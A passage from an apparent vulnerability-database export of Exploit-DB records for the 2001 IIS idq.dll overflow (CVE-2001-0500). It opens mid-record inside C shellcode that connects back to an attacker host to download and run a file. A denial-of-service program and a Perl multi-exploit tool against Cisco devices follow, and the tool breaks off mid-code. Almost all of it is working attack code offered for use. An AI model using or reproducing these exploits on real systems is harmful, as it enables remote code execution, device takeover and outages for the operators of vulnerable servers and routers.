133\r\n#endif\r\n\r\n#define PORT 80\r\n#define ADDR \"attacker.mydomain.co.jp\"\r\n#define PORT_OFFSET 115\r\n#define ADDR_OFFSET 120\r\nunsigned char shellcode[]=\r\n\"\\x5B\\x33\\xC0\\x40\\x40\\xC1\\xE0\\x09\\x2B\\xE0\\x33\\xC9\\x41\\x41\\x33\\xC0\"\r\n\"\\x51\\x53\\x83\\xC3\\x06\\x88\\x03\\xB8\\xDD\\xCC\\xBB\\xAA\\xFF\\xD0\\x59\\x50\"\r\n\"\\x43\\xE2\\xEB\\x33\\xED\\x8B\\xF3\\x5F\\x33\\xC0\\x80\\x3B\\x2E\\x75\\x1E\\x88\"\r\n\"\\x03\\x83\\xFD\\x04\\x75\\x04\\x8B\\x7C\\x24\\x10\\x56\\x57\\xB8\\xDD\\xCC\\xBB\"\r\n\"\\xAA\\xFF\\xD0\\x50\\x8D\\x73\\x01\\x45\\x83\\xFD\\x08\\x74\\x03\\x43\\xEB\\xD8\"\r\n\"\\x8D\\x74\\x24\\x20\\x33\\xC0\\x50\\x40\\x50\\x40\\x50\\x8B\\x46\\xFC\\xFF\\xD0\"\r\n\"\\x8B\\xF8\\x33\\xC0\\x40\\x40\\x66\\x89\\x06\\xC1\\xE0\\x03\\x50\\x56\\x57\\x66\"\r\n\"\\xC7\\x46\\x02\\xBB\\xAA\\xC7\\x46\\x04\\x44\\x33\\x22\\x11\"\r\n#if MASKING\r\n\"\\x66\\x81\\x76\\x02\\x41\\x41\\x81\\x76\\x04\\x41\\x41\\x41\\x41\"\r\n#endif\r\n\"\\x8B\\x46\\xF8\\xFF\\xD0\\x33\\xC0\"\r\n\"\\xC7\\x06\\x5C\\x61\\x61\\x2E\\xC7\\x46\\x04\\x65\\x78\\x65\\x41\\x88\\x46\\x07\"\r\n\"\\x66\\xB8\\x80\\x01\\x50\\x66\\xB8\\x01\\x81\\x50\\x56\\x8B\\x46\\xEC\\xFF\\xD0\"\r\n\"\\x8B\\xD8\\x33\\xC0\\x50\\x40\\xC1\\xE0\\x09\\x50\\x8D\\x4E\\x08\\x51\\x57\\x8B\"\r\n\"\\x46\\xF4\\xFF\\xD0\\x85\\xC0\\x7E\\x0E\\x50\\x8D\\x4E\\x08\\x51\\x53\\x8B\\x46\"\r\n\"\\xE8\\xFF\\xD0\\x90\\xEB\\xDC\\x53\\x8B\\x46\\xE4\\xFF\\xD0\\x57\\x8B\\x46\\xF0\"\r\n\"\\xFF\\xD0\\x33\\xC0\\x50\\x56\\x56\\x8B\\x46\\xE0\\xFF\\xD0\\x33\\xC0\\xFF\\xD0\";\r\n\r\nunsigned char storage[]=\r\n\"\\xEB\\x02\"\r\n\"\\xEB\\x4E\"\r\n\"\\xE8\\xF9\\xFF\\xFF\\xFF\"\r\n\"msvcrt.ws2_32.socket.connect.recv.closesocket.\"\r\n\"_open._write._close._execl.\";\r\n\r\nunsigned char forwardjump[]=\r\n\"%u08eb\";\r\n\r\nunsigned char jump_to_shell[]=\r\n\"%uC033%uB866%u031F%u0340%u8BD8%u8B03\"\r\n\"%u6840%uDB33%u30B3%uC303%uE0FF\";\r\n\r\nunsigned int resolve(char *name)\r\n{\r\n struct hostent *he;\r\n unsigned int ip;\r\n\r\n if((ip=inet_addr(name))==(-1))\r\n {\r\n if((he=gethostbyname(name))==0)\r\n return 0;\r\n memcpy(&ip,he->h_addr,4);\r\n }\r\n return ip;\r\n}\r\n\r\nint make_connection(char *address,int port)\r\n{\r\n struct sockaddr_in server,target;\r\n int s,i,bf;\r\n fd_set wd;\r\n struct timeval tv;\r\n\r\n s = socket(AF_INET,SOCK_STREAM,0);\r\n if(s<0)\r\n return -1;\r\n memset((char *)&server,0,sizeof(server));\r\n server.sin_family = AF_INET;\r\n server.sin_addr.s_addr = htonl(INADDR_ANY);\r\n server.sin_port = 0;\r\n\r\n target.sin_family = AF_INET;\r\n target.sin_addr.s_addr = resolve(address);\r\n if(target.sin_addr.s_addr==0)\r\n {\r\n close(s);\r\n return -2;\r\n }\r\n target.sin_port = htons(port);\r\n bf = 1;\r\n ioctl(s,FIONBIO,&bf);\r\n tv.tv_sec = 10;\r\n tv.tv_usec = 0;\r\n FD_ZERO(&wd);\r\n FD_SET(s,&wd);\r\n connect(s,(struct sockaddr *)&target,sizeof(target));\r\n if((i=select(s+1,0,&wd,0,&tv))==(-1))\r\n {\r\n close(s);\r\n return -3;\r\n }\r\n if(i==0)\r\n {\r\n close(s);\r\n return -4;\r\n }\r\n i = sizeof(int);\r\n getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);\r\n if((bf!=0)||(i!=sizeof(int)))\r\n {\r\n close(s);\r\n errno = bf;\r\n return -5;\r\n }\r\n ioctl(s,FIONBIO,&bf);\r\n return s;\r\n}\r\n\r\nint get_connection(int port)\r\n{\r\n struct sockaddr_in local,remote;\r\n int lsock,csock,len,reuse_addr;\r\n\r\n lsock = socket(AF_INET,SOCK_STREAM,0);\r\n if(lsock<0)\r\n {\r\n perror(\"socket\");\r\n exit(1);\r\n }\r\n reuse_addr = 1;\r\n if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reus\r\ne_addr))<0)\r\n {\r\n perror(\"setsockopt\");\r\n close(lsock);\r\n exit(1);\r\n }\r\n memset((char *)&local,0,sizeof(local));\r\n local.sin_family = AF_INET;\r\n local.sin_port = htons(port);\r\n local.sin_addr.s_addr = htonl(INADDR_ANY);\r\n if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)\r\n {\r\n perror(\"bind\");\r\n close(lsock);\r\n exit(1);\r\n }\r\n if(listen(lsock,1)<0)\r\n {\r\n perror(\"listen\");\r\n close(lsock);\r\n exit(1);\r\n }\r\nretry:\r\n len = sizeof(remote);\r\n csock = accept(lsock,(struct sockaddr *)&remote,&len);\r\n if(csock<0)\r\n {\r\n if(errno!=EINTR)\r\n {\r\n perror(\"accept\");\r\n close(lsock);\r\n exit(1);\r\n }\r\n else\r\n goto retry;\r\n }\r\n close(lsock);\r\n return csock;\r\n}\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n int i,j,s,pid;\r\n unsigned int cb;\r\n unsigned short port;\r\n char *p,buf[512],buf2[512],buf3[2048];\r\n FILE *fp;\r\n\r\n if(argc!=3)\r\n {\r\n printf(\"usage: $ %s ip file\\n\",argv[0]);\r\n return -1;\r\n }\r\n if((fp=fopen(argv[2],\"rb\"))==0)\r\n return -2;\r\n\r\n if(!(cb=resolve(ADDR)))\r\n return -3;\r\n\r\n if((pid=fork())<0)\r\n return -4;\r\n\r\n if(pid)\r\n {\r\n fclose(fp);\r\n s = make_connection(argv[1],80);\r\n if(s<0)\r\n {\r\n printf(\"connect error:[%d].\\n\",s);\r\n kill(pid,SIGTERM);\r\n return -5;\r\n }\r\n\r\n j = strlen(shellcode);\r\n *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;\r\n *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;\r\n port = htons(PORT);\r\n#if MASKING\r\n port ^= PORTMASK;\r\n cb ^= ADDRMASK;\r\n *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;\r\n *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;\r\n#endif\r\n *(unsigned short *)&shellcode[PORT_OFFSET] = port;\r\n *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;\r\n for(i=0;i<strlen(shellcode);i++)\r\n {\r\n if((shellcode[i]==0x0a)||\r\n (shellcode[i]==0x0d)||\r\n (shellcode[i]==0x3a))\r\n break;\r\n }\r\n if(i!=j)\r\n {\r\n printf(\"bad portno or ip address...\\n\");\r\n close(s);\r\n kill(pid,SIGTERM);\r\n return -6;\r\n }\r\n\r\n memset(buf,1,sizeof(buf));\r\n p = &buf[OFFSET-2];\r\n sprintf(p,\"%s\",forwardjump);\r\n p += strlen(forwardjump);\r\n *p++ = 1;\r\n *p++ = '%';\r\n *p++ = 'u';\r\n sprintf(p,\"%04x\",(RET>>0)&0xffff);\r\n p += 4;\r\n *p++ = '%';\r\n *p++ = 'u';\r\n sprintf(p,\"%04x\",(RET>>16)&0xffff);\r\n p += 4;\r\n *p++ = 1;\r\n sprintf(p,\"%s\",jump_to_shell);\r\n\r\n memset(buf2,NOP,sizeof(buf2));\r\n memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage,\r\nstrlen(storage));\r\n memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellco\r\nde));\r\n buf2[sizeof(buf2)-1] = 0;\r\n\r\n sprintf(buf3,\"GET /a.idq?%s=a HTTP/1.0\\r\\nShell: %s\\r\\n\\r\\n\",buf,buf2);\r\n write(s,buf3,strlen(buf3));\r\n\r\n printf(\"---\");\r\n for(i=0;i<strlen(buf3);i++)\r\n {\r\n if((i%16)==0)\r\n printf(\"\\n\");\r\n printf(\"%02X \",buf3[i]&0xff);\r\n }\r\n printf(\"\\n---\\n\");\r\n\r\n wait(0);\r\n sleep(1);\r\n shutdown(s,2);\r\n close(s);\r\n\r\n printf(\"Done.\\n\");\r\n }\r\n else\r\n {\r\n s = get_connection(PORT);\r\n j = 0;\r\n while((i=fread(buf,1,sizeof(buf),fp)))\r\n {\r\n write(s,buf,i);\r\n j += i;\r\n printf(\".\");\r\n fflush(stdout);\r\n }\r\n fclose(fp);\r\n printf(\"\\n%d bytes send...\\n\",j);\r\n\r\n shutdown(s,2);\r\n close(s);\r\n }\r\n\r\n return 0;\r\n}\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20931/"}, {"lastseen": "2016-02-02T15:18:24", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (1). CVE-2001-0500. Dos exploit for windows platform", "published": "2001-06-18T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-18T00:00:00", "id": "EDB-ID:20930", "href": "https://www.exploit-db.com/exploits/20930/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n\r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n\r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n\r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n// DoS for isapi idq.dll unchecked buffer.\r\n// For Testing Pruposes\r\n// By Ps0 DtMF dot com dot ar\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n\r\n// #define DEBUG\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n char mensaje[800];\r\n char *bof;\r\n int fd;\r\n struct sockaddr_in sin;\r\n struct hostent *rhost;\r\n\r\n if(argc<2) {\r\n fprintf(stderr,\"Use : %s host\\n\",argv[0]);\r\n exit(0);\r\n }\r\n \r\n bzero(mensaje,strlen(mensaje));\r\n \r\n bof=(char *)malloc(240); // 240 segun eeye , si se le da mas NO anda\r\n \r\n memset(bof,'A',240);\r\n \r\n sprintf(mensaje,\"GET /NULL.ida?%s=X HTTP/1.0\\n\\n\",bof);\r\n \r\n \r\n#ifdef DEBUG\r\n printf(\"\\nMenssage : \\n%s\\n\",mensaje);\r\n#endif\r\n \r\n if ((rhost=gethostbyname(argv[1]))==NULL){\r\n printf(\"\\nCan't find remote host %s \\t E:%d\\n\",argv[1],h_errno);\r\n return -1;\r\n }\r\n\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(80);\r\n\r\n memcpy(&sin.sin_addr.s_addr, rhost->h_addr, rhost->h_length);\r\n\r\n fd = socket(AF_INET,SOCK_STREAM,6);\r\n\r\n if (connect(fd,(struct sockaddr *)&sin, sizeof(struct sockaddr))!=0){\r\n printf(\"\\nCan't Connect to The host %s. May be down ? E:%s\\n\",argv[1],strerror(errno));\r\n return -1;\r\n }\r\n \r\n printf(\"Sending string........\\n\");\r\n \r\n if(send(fd,mensaje,strlen(mensaje),0)==-1){\r\n printf(\"\\nError \\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"\\nString Sent... try telnet host 80 to check if IIS is down\\n\");\r\n \r\n close(fd);\r\n \r\n return 0;\r\n \r\n}\r\n \r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20930/"}, {"lastseen": "2016-02-02T15:18:47", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (4). CVE-2001-0500. Remote exploit for windows platform", "published": "2001-06-18T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 4", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-18T00:00:00", "id": "EDB-ID:20933", "href": "https://www.exploit-db.com/exploits/20933/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n \r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n \r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n \r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n#!/usr/bin/perl\r\n\r\n##\r\n# Cisco Global Exploiter\r\n#\r\n# Legal notes :\r\n# The BlackAngels staff refuse all responsabilities\r\n# for an incorrect or illegal use of this software\r\n# or for eventual damages to others systems.\r\n#\r\n# http://www.blackangels.it\r\n##\r\n\r\n\r\n\r\n##\r\n# Modules\r\n##\r\n\r\nuse Socket;\r\nuse IO::Socket;\r\n\r\n\r\n##\r\n# Main\r\n##\r\n\r\n$host = \"\";\r\n$expvuln = \"\";\r\n$host = @ARGV[ 0 ];\r\n$expvuln = @ARGV[ 1 ];\r\n\r\nif ($host eq \"\") {\r\nusage();\r\n}\r\nif ($expvuln eq \"\") {\r\nusage();\r\n}\r\nif ($expvuln eq \"1\") {\r\ncisco1();\r\n}\r\nelsif ($expvuln eq \"2\") {\r\ncisco2();\r\n}\r\nelsif ($expvuln eq \"3\") {\r\ncisco3();\r\n}\r\nelsif ($expvuln eq \"4\") {\r\ncisco4();\r\n}\r\nelsif ($expvuln eq \"5\") {\r\ncisco5();\r\n}\r\nelsif ($expvuln eq \"6\") {\r\ncisco6();\r\n}\r\nelsif ($expvuln eq \"7\") {\r\ncisco7();\r\n}\r\nelsif ($expvuln eq \"8\") {\r\ncisco8();\r\n}\r\nelsif ($expvuln eq \"9\") {\r\ncisco9();\r\n}\r\nelsif ($expvuln eq \"10\") {\r\ncisco10();\r\n}\r\nelsif ($expvuln eq \"11\") {\r\ncisco11();\r\n}\r\nelsif ($expvuln eq \"12\") {\r\ncisco12();\r\n}\r\nelsif ($expvuln eq \"13\") {\r\ncisco13();\r\n}\r\nelsif ($expvuln eq \"14\") {\r\ncisco14();\r\n}\r\nelse {\r\nprintf \"\\nInvalid vulnerability number ...\\n\\n\";\r\nexit(1);\r\n}\r\n\r\n\r\n##\r\n# Functions\r\n##\r\n\r\nsub usage\r\n{\r\n printf \"\\nUsage :\\n\";\r\n printf \"perl cge.pl <target> <vulnerability number>\\n\\n\";\r\n printf \"Vulnerabilities list :\\n\";\r\n printf \"[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\\n\";\r\n printf \"[2] - Cisco IOS Router Denial of Service Vulnerability\\n\";\r\n printf \"[3] - Cisco IOS HTTP Auth Vulnerability\\n\";\r\n printf \"[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\\n\";\r\n printf \"[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\\n\";\r\n printf \"[6] - Cisco 675 Web Administration Denial of Service Vulnerability\\n\";\r\n printf \"[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\\n\";\r\n printf \"[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\\n\";\r\n printf \"[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\\n\";\r\n printf \"[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\\n\";\r\n printf \"[11] - Cisco Catalyst Memory Leak Vulnerability\\n\";\r\n printf \"[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\\n\";\r\n printf \"[13] - %u Encoding IDS Bypass Vulnerability (UTF)\\n\";\r\n printf \"[14] - Cisco IOS HTTP Denial of Service Vulnerability\\n\";\r\n exit(1);\r\n}\r\n\r\nsub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability\r\n{\r\n my $serv = $host;\r\n my $dch = \"?????????????????a~ %%%%%XX%%%%%\";\r\n my $num = 30000;\r\n my $string .= $dch x $num;\r\n my $shc=\"\\015\\012\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto => \"tcp\",\r\n PeerAddr => $serv,\r\n PeerPort => \"(23)\",\r\n ) || die(\"No telnet server detected on $serv ...\\n\\n\");\r\n\r\n $sockd->autoflush(1);\r\n print $sockd \"$string\". $shc;\r\n while (<$sockd>){ print }\r\n print(\"\\nPacket sent ...\\n\");\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto => \"tcp\",\r\n PeerAddr => $serv,\r\n PeerPort => \"(23)\",\r\n ) || die(\"Vulnerability successful exploited. Target server is down ...\\n\\n\");\r\n\r\n print(\"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\");\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco2 # Cisco IOS Router Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd){die \"No http server detected on $serv ...\\n\\n\"};\r\n $sockd->autoflush(1);\r\n print $sockd \"GET /\\%\\% HTTP/1.0\\n\\n\";\r\n -close $sockd;\r\n print \"Packet sent ...\\n\";\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print(\"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\");\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco3 # Cisco IOS HTTP Auth Vulnerability\r\n{\r\n my $serv= $host;\r\n my $n=16;\r\n my $port=80;\r\n my $target = inet_aton($serv);\r\n my $fg = 0;\r\n\r\n LAB: while ($n<100) {\r\n my @results=exploit(\"GET /level/\".$n.\"/exec/- HTTP/1.0\\r\\n\\r\\n\");\r\n $n++;\r\n foreach $line (@results){\r\n $line=~ tr/A-Z/a-z/;\r\n if ($line =~ /http\\/1\\.0 401 unauthorized/) {$fg=1;}\r\n if ($line =~ /http\\/1\\.0 200 ok/) {$fg=0;}\r\n }\r\n\r\n if ($fg==1) {\r\n sleep(2);\r\n print \"Vulnerability unsuccessful exploited ...\\n\\n\";\r\n }\r\n else {\r\n sleep(2);\r\n print \"\\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\\n\\n\";\r\n last LAB;\r\n }\r\n\r\n sub exploit {\r\n my ($pstr)=@_;\r\n socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||\r\n die(\"Unable to initialize socket ...\\n\\n\");\r\n if(connect(S,pack \"SnA4x8\",2,$port,$target)){\r\n my @in;\r\n select(S);\r\n $|=1;\r\n print $pstr;\r\n while(<S>){ push @in, $_;}\r\n select(STDOUT); close(S); return @in;\r\n }\r\n else { die(\"No http server detected on $serv ...\\n\\n\"); }\r\n }\r\n }\r\n exit(1);\r\n}\r\n\r\nsub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\r\n{\r\n my $serv = $host;\r\n my $n = 16;\r\n\r\n while ($n <100) {\r\n exploit1(\"GET /level/$n/exec/- HTTP/1.0\\n\\n\");\r\n $wr =~ s/\\n//g;\r\n if ($wr =~ /200 ok/) {\r\n while(1)\r\n { print \"\\nVulnerability could be successful exploited. Please choose a type of attack :\\n\";\r\n print \"[1] Banner change\\n\";\r\n print \"[2] List vty 0 4 acl info\\n\";\r\n print \"[3] Other\\n\";\r\n print \"Enter a valid option [ 1 - 2 - 3 ] : \";\r\n $vuln = <STDIN>;\r\n chomp($vuln);\r\n\r\n if ($vuln == 1) {\r\n print \"\\nEnter deface line : \";\r\n $vuln = <STDIN>;\r\n chomp($vuln);\r\n exploit1(\"GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\\n\\n\");\r\n }\r\n elsif ($vuln == 2) {\r\n exploit1(\"GET /level/$n/exec/show%20conf HTTP/1.0\\n\\n\");\r\n print \"$wrf\";\r\n }\r\n elsif ($vuln == 3)\r\n { print \"\\nEnter attack URL : \";\r\n $vuln = <STDIN>;\r\n chomp($vuln);\r\n exploit1(\"GET /$vuln HTTP/1.0\\n\\n\");\r\n print \"$wrf\";\r\n }\r\n }\r\n }\r\n $wr = \"\";\r\n $n++;\r\n }\r\n die \"Vulnerability unsuccessful exploited ...\\n\\n\";\r\n\r\n sub exploit1 {\r\n my $sockd = IO::Socket::INET -> new (\r\n Proto => 'tcp',\r\n PeerAddr => $serv,\r\n PeerPort => 80,\r\n Type => SOCK_STREAM,\r\n Timeout => 5);\r\n unless($sockd){die \"No http server detected on $serv ...\\n\\n\"}\r\n $sockd->autoflush(1);\r\n $sockd -> send($_[0]);\r\n while(<$sockd>){$wr .= $_} $wrf = $wr;\r\n close $sockd;\r\n }\r\n exit(1);\r\n}\r\n\r\nsub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 22;\r\n my $vuln = \"a%a%a%a%a%a%a%\";\r\n \r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => \"tcp\")\r\n || die \"No ssh server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 80;\r\n my $vuln = \"GET ? HTTP/1.0\\n\\n\";\r\n \r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n sleep(2);\r\n print \"\\nServer response :\\n\\n\";\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 80;\r\n my $k = \"\";\r\n \r\n print \"Enter a file to read [ /show/config/cr set as default ] : \";\r\n $k = <STDIN>;\r\n chomp ($k);\r\n if ($k eq \"\")\r\n {$vuln = \"GET /exec/show/config/cr HTTP/1.0\\n\\n\";}\r\n else\r\n {$vuln = \"GET /exec$k HTTP/1.0\\n\\n\";}\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n sleep(2);\r\n print \"\\nServer response :\\n\\n\";\r\n while (<$sockd>){print}\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 80;\r\n my $vuln = \"GET /error?/ HTTP/1.0\\n\\n\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n sleep(2);\r\n print \"\\nServer response :\\n\\n\";\r\n while (<$sockd>){print}\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability\r\n{\r\n my $ip = $host;\r\n my $port = \"514\";\r\n my $ports = \"\";\r\n my $size = \"\";\r\n my $i = \"\";\r\n my $string = \"%%%%%XX%%%%%\";\r\n\r\n print \"Input packets size : \";\r\n $size = <STDIN>;\r\n chomp($size);\r\n\r\n socket(SS, PF_INET, SOCK_DGRAM, 17);\r\n my $iaddr = inet_aton(\"$ip\");\r\n\r\n for ($i=0; $i<10000; $i++)\r\n { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }\r\n\r\n printf \"\\nPackets sent ...\\n\";\r\n sleep(2);\r\n printf \"Please enter a server's open port : \";\r\n $ports = <STDIN>;\r\n chomp $ports;\r\n printf \"\\nNow checking server status ...\\n\";\r\n sleep(2);\r\n\r\n socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die \"An error occuring while loading socket ...\\n\\n\";\r\n my $dest = sockaddr_in ($ports, inet_aton($ip));\r\n connect (SO, $dest) || die \"Vulnerability successful exploited. Target server is down ...\\n\\n\";\r\n\r\n printf \"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\";\r\n exit(1);\r\n}\r\n\r\nsub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\r\n{\r\n my $ip = $host;\r\n my $vln = \"%%%%%XX%%%%%\";\r\n my $num = 30000;\r\n my $string .= $vln x $num;\r\n my $shc=\"\\015\\012\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto => \"tcp\",\r\n PeerAddr => $ip,\r\n PeerPort => \"(2002)\",\r\n ) || die \"Unable to connect to $ip:2002 ...\\n\\n\";\r\n\r\n $sockd->autoflush(1);\r\n print $sockd \"$string\" . $shc;\r\n while (<$sockd>){ print }\r\n print \"Packet sent ...\\n\";\r\n close($sockd);\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$ip,\r\n PeerPort=>\"(2002)\",);\r\n unless ($sockd){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print(\"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\");\r\n exit(1);\r\n}\r\n\r\nsub cisco11 # Cisco Catalyst Memory Leak Vulnerability\r\n{\r\n my $serv = $host;\r\n my $rep = \"\";\r\n my $str = \"AAA\\n\";\r\n\r\n print \"\\nInput the number of repetitions : \";\r\n $rep = <STDIN>;\r\n chomp $rep;\r\n \r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => \"(23)\",\r\n Proto => \"tcp\")\r\n || die \"No telnet server detected on $serv ...\\n\\n\";\r\n\r\n for ($k=0; $k<=$rep; $k++) {\r\n print $sockd \"$str\";\r\n sleep(1);\r\n print $sockd \"$str\";\r\n sleep(1);\r\n }\r\n close($sockd);\r\n print \"Packet sent ...\\n\";\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n \r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"(23)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print \"Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\\\n\";\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\r\n{\r\n my $serv = $host;\r\n my $l =100;\r\n my $vuln = \"\";\r\n my $long = \"A\" x $l;\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => \"(80)\",\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n for ($k=0; $k<=50; $k++) {\r\n my $vuln = \"GET \" . $long . \" HTTP/1.0\\n\\n\";\r\n print $sockd \"$vuln\\n\\n\";\r\n sleep(1);\r\n $l = $l + 100;\r\n }\r\n\r\n close($sockd);\r\n print \"Packet sent ...\\n\";\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n 